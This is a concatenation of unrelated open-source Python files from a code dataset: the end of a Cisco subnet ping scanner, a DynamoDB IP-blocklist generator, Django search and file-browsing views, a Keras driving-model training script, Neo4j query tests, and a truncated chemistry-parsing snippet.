all_hosts[89:108], all_hosts[108:126]\n ]\n elif prefix == 24:\n return [\n all_hosts[0:25], all_hosts[25:50], all_hosts[50:75], all_hosts[75:100],\n all_hosts[100:125], all_hosts[125:150], all_hosts[150:175], all_hosts[175:200],\n all_hosts[200:225], all_hosts[225:250], all_hosts[250:254]\n ]\n elif prefix == 23:\n return [\n all_hosts[0:51], all_hosts[51:102], all_hosts[102:153], all_hosts[153:204],\n all_hosts[204:255], all_hosts[255:306], all_hosts[306:357], all_hosts[357:408],\n all_hosts[408:459], all_hosts[459:510]\n ]\n else:\n raise SubnetTooLarge\n\n\nclass ProgressBar:\n def __init__(self, iterable, prefix):\n self.bar = progressbar(iterable, prefix=prefix)\n\n\nclass Scan:\n \"\"\"Initiates IP scan of IP subnet from Cisco IOS or NX-OS devices\\n\n Subnet can be between a /29 and /23\"\"\"\n def __init__(self, network, devicetype, source_vlan, connection, create_intf=False, intf_ip=None, vrf=None,\n count=2, timeout=1, progress_bar=False):\n\n # Intf IP required if creating interface\n if create_intf and intf_ip is None:\n raise NoIntfIPSpecified\n\n # Intf IP required if NX-OS\n if devicetype == 'cisco_nxos' and intf_ip is None:\n raise NoNXOSIntfIPSpecified\n\n # Checks VLAN to make sure valid VLAN ID within extended VLAN range and not within reserved VLAN ID range\n if int(source_vlan) not in range(1, 4095) or int(source_vlan) in range(1002, 1006):\n raise InvalidVlanID\n\n # Checks to make sure network is valid\n try:\n network = IPv4Network(network)\n except AddressValueError:\n raise InvalidNetworkID\n\n # Checks to make sure interface IP address is valid IP address and IP address in within the specific network\n if intf_ip is not None:\n if not ipv4(intf_ip):\n raise InvalidInterfaceIP\n if not any(intf_ip == str(h1) for h1 in network.hosts()):\n raise InterfaceIPAddressNotInNetwork\n \n # Checks for source vlan in device VLAN database\n session = connection.connection().session\n try:\n vlan_db = session.send_command('show vlan brief', use_textfsm=True)\n except ValueError:\n raise TemplatesNotFoundWithinPackage\n if not any(source_vlan == v1['vlan_id'] for v1 in vlan_db):\n raise VlanNotInVlanDB\n\n # Creates Interface\n if create_intf and intf_ip is not None:\n if vrf is None:\n session.send_config_set([\n f'interface vlan {source_vlan}',\n f'ip address {intf_ip} {network.netmask}',\n 'no shut'\n ])\n else:\n if devicetype == 'cisco_nxos':\n vrf_cmd = f'vrf member {vrf}'\n else:\n vrf_cmd = f'vrf forwarding {vrf}'\n session.send_config_set([\n f'interface vlan {source_vlan}',\n vrf_cmd,\n f'ip address {intf_ip} {network.netmask}',\n 'no shut'\n ])\n \n # Creating list of dictionaries for hosts for later sorted of unordered output data from scan\n self.all_hosts = []\n \"\"\"All hosts in specified subnet with dictionaries including reachability info, ip address, and mac address\"\"\"\n for h in network.hosts():\n self.all_hosts.append(\n {\n 'address': str(h)\n }\n )\n\n reachable_devices = []\n\n def scan(host, conn):\n \"\"\"Main IP subnet Scan function\"\"\"\n ip_address = host['address']\n # Formats input command for proper formatting based on if IOS(-XE) or NX-OS operating system\n # Also checks to make sure device type is IOS(-XE) or NX-OS\n if devicetype == 'cisco_ios':\n if vrf is None:\n cmd = f'ping {ip_address} repeat {count} timeout {timeout} source vlan {source_vlan}'\n else:\n cmd = f'ping vrf {vrf} {ip_address} repeat {count} timeout {timeout} source vlan {source_vlan}'\n elif devicetype == 'cisco_nxos':\n if vrf is None:\n cmd = f'ping {ip_address} count {count} timeout {timeout} source {intf_ip}'\n else:\n cmd = f'ping {ip_address} vrf {vrf} count {count} timeout {timeout} source {intf_ip}'\n else:\n raise InvalidDeviceType\n\n cmd_output = conn.send_command(cmd)\n \n # Checks for cmd input errors\n if cmd_output.__contains__('Invalid'):\n if devicetype == 'cisco_ios':\n if cmd_output.__contains__(\n 'Invalid source interface - Interface vrf does not match the vrf used for ping'):\n raise NoVRFSpecifiedWithIntInVRF\n if cmd_output.__contains__('does not exist'):\n raise InvalidVRF\n if cmd_output.__contains__('input detected'):\n raise InvalidIntfIPAddress\n else:\n if cmd_output.__contains__('bind to address'):\n raise NoVRFSpecifiedWithIntInVRF\n if cmd_output.__contains__('does not exist'):\n raise InvalidVRF\n if cmd_output.__contains__('Invalid host/interface'):\n raise InvalidIntfIPAddress\n else:\n # Checks if device recieved ping echo then appending IP address to list if non-0 value\n if devicetype == 'cisco_ios':\n try:\n if str(cmd_output.split('\\n')[4].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n except IndexError:\n if str(cmd_output.split('\\n')[5].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n else:\n if str(cmd_output.split('\\n')[5].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n\n # Splits hosts list into mulitple smaller lists for for multiple asyncronous SSH/TELNET sessions\n hosts_lists = hosts_lists_parse(int(network.prefixlen), self.all_hosts)\n\n if progress_bar:\n self.phase_num = 1\n \"\"\"Internal use only for progress bar numbers\"\"\"\n\n def host_split(host_list):\n session1 = connection.connection().session\n if progress_bar:\n bar = ProgressBar(host_list, f'Phase {str(self.phase_num)}: ').bar\n self.phase_num += 1\n for h1 in bar:\n scan(h1, session1)\n else:\n for h1 in host_list:\n scan(h1, session1)\n session1.disconnect()\n \n mt(host_split, hosts_lists, threads=len(hosts_lists))\n\n arps = session.send_command(f'show ip arp vlan {source_vlan}', use_textfsm=True)\n\n # Creates Interface\n if create_intf:\n session.send_config_set([f'no interface vlan {source_vlan}'])\n session.disconnect()\n\n def sort(host):\n for arp in arps:\n if arp['address'] == host['address'] and arp['mac'].count('.') == 2:\n host['mac'] = arp['mac']\n if any(host['address'] == reachable_device for reachable_device in reachable_devices):\n host['status'] = 'Reachable'\n else:\n host['status'] = 'Unreachable'\n\n mt(sort, self.all_hosts)\n","repo_name":"ZackDowning/CiscoIPScanner","sub_path":"CiscoIPScanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39758481153","text":"import configparser\nimport os\nimport boto3\nfrom botocore.exceptions import ClientError\n\n\ndef startup():\n config = configparser.ConfigParser()\n config.read('blacklistgenerator.cfg')\n iptable = \"None\"\n awsregion = \"us-east-1\"\n try:\n iptable = config['blacklist']['iptable']\n awsregion = config['blacklist']['awsregion']\n except KeyError as e:\n print(\"No config file, so pulling info from my user's AWS tags.\")\n iam = boto3.resource(\"iam\")\n user = iam.CurrentUser()\n tagset = user.tags\n for tag in tagset:\n if tag['Key'] == 'AWSRegion':\n awsregion = tag['Value']\n if tag['Key'] == 'LogTable':\n iptable = tag['Value']\n config = {}\n config[\"iptable\"] = iptable\n config[\"awsregion\"] = awsregion\n return config\n\ndef getips(config, mincount):\n dynamodb = boto3.client(\"dynamodb\", region_name=config[\"awsregion\"])\n table = config[\"iptable\"]\n try:\n response = dynamodb.scan(\n TableName = table\n )\n itemdict = response[\"Items\"]\n newitemdict = {}\n for item in itemdict:\n itemcount = int(item[\"count\"][\"N\"])\n srcip = item[\"srcip\"][\"S\"]\n count = 0\n if srcip in newitemdict:\n count = newitemdict[srcip]\n newitemdict[item[\"srcip\"][\"S\"]] = count + itemcount\n\n dynamodb = boto3.resource(\"dynamodb\", region_name=config[\"awsregion\"])\n tableobj = dynamodb.Table(table)\n newitems = []\n for item in newitemdict:\n if newitemdict[item] > 2:\n tempitem = {\n \"srcip\": item,\n \"count\": newitemdict[item]\n }\n for entry in itemdict:\n if entry[\"srcip\"]['S'] == item:\n index = entry[\"FortiLogID\"][\"S\"]\n response = tableobj.get_item(Key={'FortiLogID': index}, TableName=table)\n object = response[\"Item\"]\n object[\"status\"] = \"Banned\"\n response = tableobj.put_item(TableName=table, Item=object)\n print(f'Updated entry for {index} to Banned')\n newitems.append(tempitem)\n else:\n totalcount = newitemdict[item]\n for entry in itemdict:\n if entry[\"srcip\"]['S'] == item:\n index = entry[\"FortiLogID\"][\"S\"]\n response = tableobj.get_item(Key={'FortiLogID': index}, TableName=table)\n if \"Item\" in response:\n object = response[\"Item\"]\n else:\n print(response)\n object[\"total\"] = totalcount\n response = tableobj.put_item(TableName=table, Item=object)\n print(f'Updated total for {index} to {totalcount}')\n return newitems\n\n except ClientError as e:\n print(e.response['Error']['Message'])\n print(\"No Item exists, yet\")\n\ndef writeips(iplist):\n ipstring = \"\"\n for ip in iplist:\n ipstring += ip[\"srcip\"] + \"\\n\"\n print(ipstring)\n ipfile = os.getenv(\"ipfile\")\n with open(ipfile, \"w\") as outfile:\n outfile.write(ipstring)\n\ndef main(name):\n config = startup()\n iplist = getips(config, 1)\n writeips(iplist)\n\nif __name__ == '__main__':\n main('')\n\n","repo_name":"alomas/blacklistgenerator","sub_path":"blacklistgenerator.py","file_name":"blacklistgenerator.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7845504690","text":"from django.shortcuts import render\nfrom psyduck_search.crawler import Crawler\nfrom django.http import HttpResponse\nimport json\nimport time\nfrom psyduck_search import db_helper\n\n\nclass Search:\n result = None\n crawler = None\n out_tag = None\n current = 0\n total = 0\n keyword = ''\n uuid = ''\n pages = 0\n start_time = None\n\n def __init__(self, uuid):\n self.uuid = uuid\n self.crawler = Crawler()\n self.result = {}\n\n def __progress_callback(self, i, n):\n self.current = i\n self.total = n\n\n def __new_info_callback(self, info):\n if info['coin'] == 0 and info['url'] not in self.result.keys():\n self.result[info['url']] = info\n if not db_helper.exist_download(info['id']):\n db_helper.insert_download(info)\n\n def __finish_callback(self):\n cost = '%.2f' % (time.time() - self.start_time)\n log(self.uuid, f'搜索【{self.keyword}】完成,共{len(self.result)}条结果,耗时:{cost}秒')\n db_helper.insert_log(\n {'uuid': self.uuid, 'keyword': self.keyword, 'pages': self.pages, 'result': len(self.result), 'cost': cost})\n self.current = 0\n self.total = 0\n self.pages = 0\n self.keyword = ''\n\n def is_running(self):\n return self.crawler.is_running\n\n def search(self, keyword, pages):\n while self.is_running():\n self.crawler.signal_stop()\n time.sleep(0.1)\n log(self.uuid, f'开始搜索【{keyword}】,搜索深度:{pages}页')\n self.start_time = time.time()\n self.keyword = keyword\n self.pages = pages\n self.crawler.search_pages = pages\n self.crawler.async_search(keyword, self.__new_info_callback, self.__progress_callback, self.__finish_callback)\n\n\nsearch_dict: {str, Search} = {}\n\n\ndef _response(state, result_count=0, p_i=0, p_n=0, result_json=''):\n return HttpResponse(\n json.dumps({'state': state, 'result_count': result_count, 'total_count': db_helper.count_download(),\n 'p_i': p_i, 'p_n': p_n, 'result_json': result_json}),\n content_type='application/json')\n\n\ndef search(request):\n return render(request, 'index.html')\n\n\ndef search_progress(request):\n if request.method == 'GET':\n return HttpResponse()\n\n uuid = request.POST.get('murmur', '')\n act = request.POST.get('act', '')\n keyword = request.POST.get('keyword', '')\n pages = request.POST.get('pages', '')\n if pages == '':\n pages = 0\n else:\n pages = int(pages)\n if uuid == '':\n return _response('none')\n\n if uuid not in search_dict.keys():\n search_dict[uuid] = Search(uuid)\n\n sr: Search = search_dict[uuid]\n if act == 'begin':\n if sr.keyword != keyword or sr.pages != pages:\n sr.search(keyword, pages)\n elif act == 'clear':\n log(uuid, '清空结果')\n sr.result = {}\n\n result_json = ''\n if act == 'result' or sr.out_tag != len(sr.result):\n result_json = json.dumps(sr.result)\n sr.out_tag = len(sr.result)\n\n state = ''\n if sr.is_running():\n state = 'search'\n\n return _response(state, len(sr.result), sr.current, sr.total, result_json)\n\n\ndef log(uuid, msg):\n import datetime\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') # 现在\n print('[{}]:{} 于 ({})'.format(uuid[0:6], msg, now_time))\n","repo_name":"SilenceT/csdn_helper_pub","sub_path":"psyduck_search/psyduck_search/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38518501380","text":"import os\nimport string\nfrom django.http import response\nfrom django.shortcuts import render\n\n\ndef get_disklist():\n disk_list = []\n for c in string.ascii_uppercase:\n disk = c+':'\n if os.path.isdir(disk):\n disk_list.append(disk)\n\n return disk_list\n\n\ndef handle_dir(path):\n item_list = os.listdir(path=path+\"/\")\n dir_list = []\n file_list = []\n\n for item in item_list:\n if os.path.isdir(path+\"/\"+item):\n dir_list.append(item)\n else:\n file_list.append(item)\n\n dir_list = [\"..\"]+dir_list\n\n return dir_list, file_list\n\n\ndef index(request):\n item_list = get_disklist()\n context = {'item_list': item_list}\n return render(request, \"handle/index.html\", context)\n\n\ndef update(request):\n if(request.method == 'GET'):\n path = request.GET.get(\"path\")\n \n if path==\"\":\n item_list = get_disklist()\n context = {'dir_list': item_list, 'file_list':\"\"}\n return response.JsonResponse(context, safe=False)\n\n elif os.path.isdir(path):\n dir_list, file_list = handle_dir(path)\n context = {'dir_list': dir_list,'file_list':file_list}\n return response.JsonResponse(context, safe=False)\n\n elif path.split(\".\")[-1] == \"html\":\n try:\n res = response.FileResponse(open(path, 'rb'))\n res['content_type'] = \"application/octet-stream\"\n res['Content-Disposition'] = 'attachment; filename=' + os.path.basename(path)\n return res\n except Exception:\n raise response.HTTP404\n\n else:\n return response.HttpResponse(\"TODO...\")\n","repo_name":"punnpkin/hftp","sub_path":"handle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20175036364","text":"import tensorflow as tf\nfrom keras.models import Sequential \nfrom keras.layers import Dense, Flatten, Activation, Dropout, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.regularizers import l2\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import ELU\n\nimport keras\nfrom keras.layers import GlobalAveragePooling2D , Input\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom keras.preprocessing.image import img_to_array\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom skimage import transform\nfrom skimage import exposure\n\nimport numpy as np\nimport math\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\nimport csv\nimport random\nimport pickle\n\nlines = []\nimages = []\nload_data = False\n\ndef balance_data(X, y, bins):\n\n new_y = []\n new_X = []\n\n bal = np.linspace(-1,1,bins)\n hist = plt.hist(y,bins = bal)\n total = sum(hist[0])\n dist = hist[0]\n mean = dist[dist!=0]\n\n size = ((total*0.1) / len(mean))\n sample_size = np.repeat(size, len(dist)).astype(np.int)\n \n for i in range(0,len(bal)-1):\n y_inrange = [y for X, y in zip(X, y) if y >= bal[i] and y <= bal[i + 1]]\n x_inrange = [X for X, y in zip(X, y) if y >= bal[i] and y <= bal[i + 1]]\n\n if len(y_inrange)!=0:\n rand = random.choice(range(len(y_inrange)), sample_size[i], replace = True)\n new_y.append([y_inrange[j] for j in rand])\n new_X.append([x_inrange[j] for j in rand])\n\n return new_X, new_y\n\ndef generate_data(samples, batch_size = 64,Augment=True):\n \n num_samples = len(samples)\n while True:\n shuffle(samples)\n for offset in range(0,num_samples,batch_size):\n batch_samples = samples[offset:offset+batch_size]\n \n images = []\n angles = []\n \n for batch_sample in batch_samples:\n for i in range(3):\n local_path = batch_sample[i]\n image = cv2.imread(local_path)\n image = image[65:140,:,:]\n image = cv2.resize(image,(200, 66))\n \n \"\"\"\n image = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)\n image, u, v = cv2.split(image)\n image = norm_exposure(image)\n \"\"\"\n images.append(image)\n \n correction = 0.20\n angle = float(batch_sample[3])\n \n angles.append(angle)\n angles.append(angle+correction)\n angles.append(angle-correction)\n \n aug_images = []\n aug_angles = []\n \n \n \n \n for image, angle in zip(images,angles):\n aug_images.append(image)\n aug_angles.append(angle)\n \n if Augment == True:\n \n transformed_image = cv2.flip(image,1)\n transformed_angle = float(angle)*-1.0\n \n #aug_images.append(transformed_image)\n #aug_angles.append(transformed_angle)\n \n \"\"\"\n rand = bool(random.getrandbits(1))\n \n if(rand==True):\n transformed_image, side = random_translation(image)\n\n if(side>0):\n angle += angle*0.15/10\n else:\n angle += angle*-0.15/10\n \"\"\"\n \n aug_images.append(transformed_image) \n aug_angles.append(transformed_angle)\n \n #shadowed_image = random_shadow(image)\n #aug_images.append(shadowed_image)\n #aug_angles.append(angle)\n \n #contrasted_image = random_contrast(image)\n #aug_images.append(contrasted_image)\n #aug_angles.append(angle)\n \n X_train = aug_images\n y_train = aug_angles\n \n if Augment == True:\n m = np.mean(aug_angles)\n s = np.std(aug_angles)\n values, counts = np.unique(aug_angles,return_counts = True)\n \n max_num = max(counts)\n \n for val_i in range(len(values)//2):\n num = max_num-counts[val_i]\n if num>0:\n value = values[val_i]\n \n if value<(m-2*s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n elif value>(m+2*s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n \"\"\"\n elif value>=(m-2*s) and value<=(m-s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n elif value<=(m+2*s) and value > (m+s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n \"\"\"\n yield shuffle(np.array(X_train),np.array(y_train))\n\nbatch = 128\nif load_data == False:\n info = []\n\n \"\"\"\n path = \"../Data/\"\n destination = np.array([#\"Udacity_data/\",\n \"track1_1/\",\n \"track1_2/\",\n \"track1_3/\",\n \"track1_4/\",\n \"track1_5/\",\n #\"Track1_a/\",\n #\"track2_1/\",\n \"track1_cor1/\",\n ])\n \"\"\"\n path = \"../Data2/\"\n destination = np.array([\"Udacity_data/\",\n \"track1_l1/\",\n \"track1_l2/\",\n \"track1_l3/\",\n #\"track1_l4/\",\n #\"track1_l5/\"\n ])\n \n csv_file = \"driving_log.csv\"\n\n for dest in destination:\n with open(path+dest+csv_file,\"r\") as file:\n reader = csv.reader(file)\n for line in reader:\n for i in range(3):\n line[i] = line[i].replace(\"\\\\\",\"/\").split(\"/\")\n line[i] = path + dest + \"IMG/\" +line[i][-1]\n \n info.append(line)\n\n train_samples,valid_samples = train_test_split(info,test_size = 0.2)\n\n with open('train_sample.p', 'wb') as f:\n pickle.dump(train_samples, f)\n \n with open('valid_sample.p','wb') as f:\n pickle.dump(valid_samples, f)\nelse:\n with open('train_sample.p','rb') as f:\n train_samples = pickle.load(f)\n\n with open('valid_sample.p','rb') as f:\n valid_samples = pickle.load(f)\n\ntrain_gen = generate_data(train_samples,batch,Augment = True)\nvalid_gen = generate_data(valid_samples,batch,Augment = False)\n\n#----Deep-Learning Model\nmodel = Sequential()\nmodel.add(Lambda(lambda x:x/255.0 -0.5,input_shape = (66,200,3)))\n#model.add(Cropping2D(cropping = ((70,25),(0,0))))\nmodel.add(Convolution2D(6,(5,5),activation = 'elu', kernel_regularizer = l2(0.001)))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(16,(5,5),activation = 'elu', kernel_regularizer = l2(0.001)))\nmodel.add(MaxPooling2D())\nmodel.add(Flatten())\nmodel.add(Dense(120, kernel_regularizer = l2(0.001)))\nmodel.add(Dense(84, kernel_regularizer = l2(0.001)))\nmodel.add(Dense(1, kernel_regularizer = l2(0.001)))\n\nmodel.compile(optimizer=Adam(lr = 1e-4),loss = 'mse')\n\nmodel.fit_generator(train_gen,\n steps_per_epoch = 5000, \n epochs=30,\n validation_data = valid_gen, \n validation_steps = 800,\n verbose=1,\n callbacks = [EarlyStopping(patience = 2)])\n\nmodel.save('model10.h5')","repo_name":"parinp/CarND-Behavioral-Cloning","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30292594490","text":"import mock\n\nfrom django.test import TestCase\n\nfrom api.query import Query\nfrom api.query import TimesQuery\n\nfrom api.exceptions import InvalidLabelError\nfrom api.exceptions import InvalidPropertyError\n\n\nclass FakeRecords(list):\n\n def single(self):\n return self[0]\n\n\nclass FakeDataset:\n\n def __init__(self, data):\n self.data = data\n self.count = 0\n\n def get_data(self):\n res = self.data[self.count]\n self.count += 1\n return res\n\n\nclass FakeTransaction:\n\n def __init__(self, data):\n self.data = data\n\n def begin_transaction(self):\n return self\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n pass\n\n def run(self, query, **params):\n return self.data.get_data()\n\n\nclass FakeSession:\n\n def __init__(self, data):\n self.data = data\n\n def __enter__(self):\n return FakeTransaction(self.data)\n\n def __exit__(self, *args):\n pass\n\n\nclass FakeConnection:\n\n def __init__(self, data):\n self.data = FakeDataset(data)\n\n def session(self):\n return FakeSession(self.data)\n\n\nclass TestQuery(TestCase):\n \"\"\"\n RETURN environment\n ORDER BY environment.account_number_name ASC\n \"\"\"\n\n def test_match_root_label(self):\n \"\"\"Test match clause targeted at a root level model.\"\"\"\n q = Query('Environment')\n expected = \"MATCH (environment:Environment)\"\n self.assertTrue(expected in str(q))\n\n def test_match_with_state(self):\n \"\"\"Test match clause including a model with state.\"\"\"\n q = Query('Host')\n expected = (\n \"MATCH (environment:Environment)-[r0:HAS_HOST]->(host:Host) \"\n \"\\nMATCH (host)-[r_host_state:HAS_STATE]->(host_state:HostState)\"\n )\n self.assertTrue(expected in str(q))\n\n def test_return_root_label(self):\n \"\"\"Test return clause targeted at a root level model.\"\"\"\n q = Query('Environment')\n expected = \"RETURN environment\"\n self.assertTrue(expected in str(q))\n\n def test_return_with_state(self):\n \"\"\"Test return clause that should include state.\"\"\"\n q = Query('Host')\n expected = 'RETURN environment, host, host_state'\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.utils.milliseconds_now', return_value=10)\n def test_default_time(self, m_now):\n \"\"\"Test that default time parameter.\"\"\"\n q = Query('Environment')\n self.assertEquals(q.params['time'], 10)\n q = Query('Environment')\n q.time(None)\n self.assertEquals(q.params['time'], 10)\n\n def test_provided_time(self):\n \"\"\"Test that providing a time changes the query params.\"\"\"\n q = Query('Environment')\n q.time(3)\n self.assertEquals(q.params['time'], 3)\n\n def test_orderby_default(self):\n \"\"\"Test default orderby clause.\"\"\"\n q = Query('Environment')\n expected = \"ORDER BY environment.account_number_name ASC\"\n self.assertTrue(expected in str(q))\n\n def test_orderby_no_label(self):\n \"\"\"Test a single nondefault orderby\"\"\"\n q = Query('Environment')\n q.orderby('account_number', 'DESC')\n expected = \"ORDER BY environment.account_number DESC\"\n self.assertTrue(expected in str(q))\n\n def test_orderby_invalid_property(self):\n \"\"\"Test that orderby raises InvalidPropertyError\"\"\"\n q = Query('Environment')\n with self.assertRaises(InvalidPropertyError):\n q.orderby('invalidproperty', 'ASC')\n\n def test_orderby_invalid_label(self):\n \"\"\"Test that orderby raises InvalidLabelError\"\"\"\n q = Query('Environment')\n with self.assertRaises(InvalidLabelError):\n q.orderby('aproperty', 'DESC', label='invalidlabel')\n\n def test_orderby_multiple(self):\n \"\"\"Test multiple orderby statements.\"\"\"\n q = Query('Environment')\n q.orderby('account_number', 'ASC', label='Environment')\n q.orderby('name', 'DESC', label='Environment')\n expected = (\n \"ORDER BY environment.account_number ASC, \"\n \"environment.name DESC\"\n )\n self.assertTrue(expected in str(q))\n\n def test_orderby_state_property(self):\n \"\"\"Test orderby on a state property.\"\"\"\n q = Query('Host')\n q.orderby('kernel', 'DESC', label='Host')\n expected = 'ORDER BY host_state.kernel DESC'\n self.assertTrue(expected in str(q))\n\n def test_limit_none(self):\n \"\"\"Test query where no limit has been set.\"\"\"\n q = Query('Environment')\n self.assertFalse('LIMIT' in str(q))\n\n def test_limit(self):\n \"\"\"Test query where a limit as been set.\"\"\"\n q = Query('Environment')\n q.limit(5)\n q.limit(10)\n self.assertTrue('LIMIT 10' in str(q))\n\n def test_skip_none(self):\n \"\"\"Test query where no skip has been set.\"\"\"\n q = Query('Environment')\n self.assertFalse('SKIP' in str(q))\n\n def test_skip(self):\n \"\"\"Test query where skip has been set.\"\"\"\n q = Query('Environment')\n q.skip(5)\n q.skip(10)\n self.assertTrue('SKIP 10' in str(q))\n\n def test_filter_without_label(self):\n \"\"\"Test filtering using default label.\"\"\"\n q = Query('Host')\n q.filter('hostname', '=', 'somehostname')\n expected = 'WHERE host.hostname = $filterval0'\n self.assertTrue(expected in str(q))\n self.assertEquals(q.params['filterval0'], 'somehostname')\n\n def test_filter_with_label(self):\n \"\"\"Test filtering with a non default label.\"\"\"\n q = Query('Host')\n q.filter('account_number', '=', 'somenumber', label='Environment')\n expected = 'WHERE environment.account_number = $filterval0'\n self.assertTrue(expected in str(q))\n\n def test_filter_invalid_label(self):\n \"\"\"Test filtering with invalid label.\"\"\"\n q = Query('Host')\n with self.assertRaises(InvalidLabelError):\n q.filter('someprop', 'someop', 'someval', label='InvalidLabel')\n\n def test_filter_invalid_prop(self):\n \"\"\"Test filtering with invalid property.\"\"\"\n q = Query('Host')\n with self.assertRaises(InvalidPropertyError):\n q.filter('someinvalidprop', 'someop', 'someval')\n\n def test_multiple_filters(self):\n \"\"\"Tests more than one filters.\"\"\"\n q = Query('Host')\n q.filter('hostname', '=', 'somehostname')\n q.filter('kernel', '=', 'somekernel')\n expected = (\n 'WHERE host.hostname = $filterval0 AND '\n 'host_state.kernel = $filterval1'\n )\n self.assertTrue(expected in str(q))\n\n def test_rel_filters(self):\n \"\"\"Test adding time filters on relationships.\"\"\"\n q = Query('Virtualenv')\n expected = (\n \"r0.from <= $time < r0.to AND r1.from <= $time < r1.to \"\n \"AND r_host_state.from <= $time < r_host_state.to\"\n )\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_count(self, m_connection):\n \"\"\"Tests counting number of results.\"\"\"\n data = FakeRecords()\n data.append({'total': 13})\n data = [data]\n m_connection.return_value = FakeConnection(data)\n q = Query('Environment')\n self.assertEquals(q.count(), 13)\n\n @mock.patch('api.query.Query.fetch')\n def test_page_defaults(self, m_fetch):\n \"\"\"Test default arguments to page() method.\"\"\"\n q = Query('Environment')\n q.page()\n\n expected = 'SKIP 0'\n self.assertTrue(expected in str(q))\n expected = 'LIMIT 100'\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_page(self, m_fetch):\n \"\"\"Test providing page with a page and a size.\"\"\"\n q = Query('Environment')\n q.page(page=3, pagesize=500)\n expected = \"SKIP 1000\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_index(self, m_fetch):\n \"\"\"Test providing page an index and a size.\"\"\"\n q = Query('Environment')\n q.page(index=3, pagesize=500)\n expected = \"SKIP 2\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_negative_index(self, m_fetch):\n \"\"\"Test providing page with a negative index and a size.\"\"\"\n q = Query('Environment')\n q.page(index=-10, pagesize=500)\n expected = \"SKIP 0\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n\nclass TestTimesQuery(TestCase):\n\n def test_query_str_and_params(self):\n label = 'Environment'\n id_ = 'someid'\n expected = (\n \"MATCH p = (environment:Environment)-[*]->(other)\"\n \"\\nWHERE environment.account_number_name = $identity\"\n \"\\nWITH relationships(p) as rels\"\n \"\\nUNWIND rels as r\"\n \"\\nreturn DISTINCT r.from as t\"\n \"\\nORDER BY t DESC\"\n )\n q = TimesQuery(label, id_)\n self.assertEquals(str(q), expected)\n self.assertEquals(q.params['identity'], id_)\n\n @mock.patch('api.query.get_connection')\n def test_fetch(self, m_connection):\n data = [[{'t': 1}, {'t': 2}, {'t': 3}]]\n m_connection.return_value = FakeConnection(data)\n q = TimesQuery('Environment', 'someid')\n self.assertListEqual([1, 2, 3], q.fetch())\n\n data = [[]]\n m_connection.return_value = FakeConnection(data)\n self.assertListEqual([], q.fetch())\n","repo_name":"absalon-james/cloud_snitch","sub_path":"web/api/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23462205667","text":"import pysmiles as psm\nimport networkx as nx\nimport numpy as np\nimport os\nimport torch\n\n'''\ndata\n化学式数目:8169\n化学式最长长度(element个数):132\n特征矩阵维度:4\n特征:\nelement: need a static dict to stand for each element\naromatic: 直接用\nhcount: 直接用\ncharge: 非常稀疏,偶尔有个-1之类的,可以考虑不用\nisotope& class 两个装死\n特征扩展:主要目的是补齐空缺位置,这个是必须的,不然会报错\n目前:feature 0扩展,维度为(4,132)\nadj 先0扩展再进行计算,维度为(132,132)\n方案1:adj矩阵扩展为0,feature矩阵也扩展为0\n方案2:读一读adj来源图,考虑一下扩展成-1?之类的,或者对角线-1?\n feature矩阵考虑扩展成-1?但是需要注意charge的-1,扩展可能不太一样\nsmile CC=CCC#N\nelement: [(0, 'C'), (1, 'C'), (2, 'C'), (3, 'C'), (4, 'C'), (5, 'N')]\naromatic: [(0, False), (1, False), (2, False), (3, False), (4, False), (5, False)]\nisotope: [(0, None), (1, None), (2, None), (3, None), (4, None), (5, None)]\nhcount: [(0, 3), (1, 1), (2, 1), (3, 2), (4, 0), (5, 